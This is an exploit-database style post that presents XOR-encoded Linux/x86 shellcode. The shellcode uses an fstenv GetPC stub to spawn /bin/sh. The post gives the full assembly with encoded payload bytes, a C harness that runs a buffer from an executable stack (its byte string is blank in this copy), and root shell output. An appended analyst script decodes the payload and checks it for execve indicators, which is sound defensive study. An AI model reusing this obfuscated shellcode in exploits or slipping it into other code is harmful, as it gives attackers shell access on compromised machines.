Linux/x86 execve /bin/sh Shellcode

70-byte Linux/x86 shellcode with an XOR decoder stub that uses fstenv (MMX/FPU) for GetPC and spawns a /bin/sh shell.

MD5 | e253cdb3deeb186f54711db1afcee22e

# Exploit Title: Linux/x86 execve /bin/sh (fstenv eip GetPC technique) (70 bytes, xor encoded)
# Date: 09/06/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86

Shellcode with an XOR decoder stub and fstenv (MMX/FPU) GetPC,
spawning a /bin/sh shell.

Uses the fstenv GetPC technique to obtain the current memory address dynamically
(an alternative to jmp-call-pop).

Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
Shellcode Length: 70
# id
uid=0(root) gid=0(root) groups=0(root)
# ps -p $$
24045 pts/4 00:00:00 sh

*** Created by d7x ***

; shellcode assembly

global _start

section .text
_start:
    fldz                      ; any FPU instruction; fstenv will record its address as the FPU instruction pointer
    fstenv [esp-0xc]          ; store the 28-byte FPU environment so the FIP field (offset 12) lands at [esp]
    pop edi                   ; put eip (the address of fldz) into edi
    add edi, 37               ; distance from fldz (0x8048060) to decoder_value (0x08048085): 37 bytes

    lea esi, [edi + 8]        ; esi -> EncodedShellcode (8 bytes past decoder_value)
    xor ecx, ecx
    mov cl, 4                 ; decode 4 qwords (32 bytes)

decode:
    movq mm0, qword [edi]     ; 8-byte XOR key
    movq mm1, qword [esi]     ; 8 encoded bytes
    pxor mm0, mm1
    movq qword [esi], mm0     ; write the decoded bytes back in place
    add esi, 0x8
    loop decode

    jmp short EncodedShellcode

decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d


#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = \
""; /* the shellcode byte string is missing from this copy of the post */

int main(void)
{
    printf("Shellcode Length: %d\n", (int)strlen((char *)shellcode));

    /* cast the buffer to a function pointer and jump into it
       (requires the executable stack set by -z execstack) */
    int (*ret)() = (int (*)())shellcode;
    ret();

    return 0;
}
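The following is an added analyst-side example, not code from the post or its author: it replays the MMX XOR decoder loop above in Python over the `decoder_value` and `EncodedShellcode` byte tables copied from the listing, then runs the static checks an analyst or detection engineer would use to confirm what such a blob decodes to (the `/bin` and `//sh` pushes, the `mov al, 0xb` execve number, the trailing `int 0x80`). The function names and the zero padding for blocks past the end of the payload are this example's own choices.

```python
# Added example (not part of the original post): emulate the MMX XOR decoder
# stub and scan the recovered payload for execve("/bin/sh") indicators.
# The byte tables are copied from the post's decoder_value / EncodedShellcode lines.

DECODER_VALUE = bytes([0x7d] * 8)          # 8-byte key loaded into mm0 via movq
ENCODED = bytes([
    0x4c, 0xbd, 0x2d, 0x15, 0x52, 0x52, 0x0e, 0x15, 0x15, 0x52, 0x1f, 0x14, 0x13,
    0xf4, 0x9e, 0x2d, 0xf4, 0x9f, 0x2e, 0xf4, 0x9c, 0xcd, 0x76, 0xb0, 0xfd,
])
QWORDS = 4                                 # mov cl, 4 -> the loop body runs four times


def mmx_xor_decode(encoded: bytes, key: bytes, qwords: int) -> bytes:
    """Replay the decoder loop: pxor of one 8-byte key against successive
    8-byte blocks, written back in place.  The stub always processes `qwords`
    full blocks, so blocks beyond the encoded payload are padded here with
    zero bytes (in memory the stub XORs whatever follows the payload)."""
    if len(key) != 8:
        raise ValueError("the MMX decoder uses a 64-bit key")
    buf = bytearray(encoded.ljust(qwords * 8, b"\x00"))
    for blk in range(qwords):
        for i in range(8):
            buf[blk * 8 + i] ^= key[i]
    return bytes(buf[: len(encoded)])


def scan_indicators(payload: bytes) -> dict:
    """Static checks that a decoded x86 blob looks like an execve("/bin/sh") syscall."""
    return {
        "pushes_bin_sh": b"/bin" in payload and b"//sh" in payload,
        "sets_execve_number": b"\xb0\x0b" in payload,   # mov al, 0xb (SYS_execve)
        "ends_with_int80": payload.endswith(b"\xcd\x80"),  # int 0x80
    }


def recover_strings(payload: bytes) -> str:
    """Printable view of the decoded bytes; the two 4-byte pushes read as "//sh" and "/bin"."""
    return "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in payload)


if __name__ == "__main__":
    decoded = mmx_xor_decode(ENCODED, DECODER_VALUE, QWORDS)
    print("decoded:", decoded.hex(" "))
    print("ascii  :", recover_strings(decoded))
    for name, hit in scan_indicators(decoded).items():
        print(f"{name:20s} {hit}")
```

Two points worth noticing from the replay: the encoded payload is 25 bytes but the stub decodes 4 qwords (32 bytes), so the 7 bytes following `EncodedShellcode` are XORed as well (harmless here because the payload ends in `int 0x80` and never falls through, but it is the kind of detail that makes a stub behave differently when the bytes are placed in a different buffer), and a single-byte key repeated across the qword means the encoding is byte-wise XOR with 0x7d, which a detection rule can undo as cheaply as the stub itself.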


